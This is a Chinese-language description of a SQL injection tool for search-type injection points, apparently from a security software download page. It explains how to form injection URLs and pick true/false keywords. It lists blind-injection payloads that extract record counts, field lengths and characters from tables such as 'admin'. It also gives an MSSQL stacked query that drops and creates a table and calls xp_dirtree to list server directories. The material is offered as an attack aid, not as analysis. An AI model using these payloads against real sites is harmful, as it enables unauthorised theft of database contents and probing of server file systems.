|
|
详细介绍:1.搜索型注入点均可构造成如下形式:http://URL/Injurl+InjSQL+Otherurl,即将注入语句插入到页面请求之中。
Injurl:注入点, InjSQL:注入语句,如:and 1=1;and (select count(*) from admin)>0
Otherurl:注入点的后缀,且位置不可改变,否则可以直接利用常用工具注入!如:and ’%’=’;
2.搜索型注入点一般都是POST方式提交数据,而此工具是利用GET方式获得页面中的关键字进行判断的,所以 应注意几点:
POST方式对提交的数据进行了编码,如:%编码后成为%25 选择的关键字必须是:and 1=1请求结果(以以页面源码为准)中存在,而and 1=2中不存在的字符, 当注入点(Injurl)为下载链接时,关键字可使用除请求返回的Head字符外任意字符,如中文!正确选择GET页面。
4.限制:
未对连接超时进行判断,猜解将无法自动终止 此版本猜解字符型字段,字符范围:0~$FFE5,Access数据库使用AscW函数猜解汉字,可能不准。如果表名、列名中含空格等特殊符号请用[]括起,如:[ad min]
5.SQL语句
猜记录数:select count(*) from tab
猜第一条记录长度:select top 1 len(fild) from tab
猜第一条记录的第一位:select top 1 unicode(substring(fild,1,1)) from tab
access语句:select top 1 ascw(mid(fild,1,1)) from tab
改第一个数字1直到字段长度;
猜第二条记录长度:select top 1 len(fild) from tab where fild not in (’**’)
猜第二条记录的第一位:select top 1 unicode(substring(fild,1,1)) from tab where fild not in (’**’)
......
判断xp_dirtree过程是否存在:(select count(*) from master..sysobjects where name=’xp_dirtree’)>0
MSSQL列目录:;DROP+TABLE+TmpTab;CREATE+TABLE+TmpTab(subdirectory+nvarchar(256)
+NULL,depth+tinyint+NULL);DELETE+TmpTab;+Insert+TmpTab+exec+master..xp_dirtree "d:",1;-- | |
安全中国首页 > 软件中心 > 综合注入
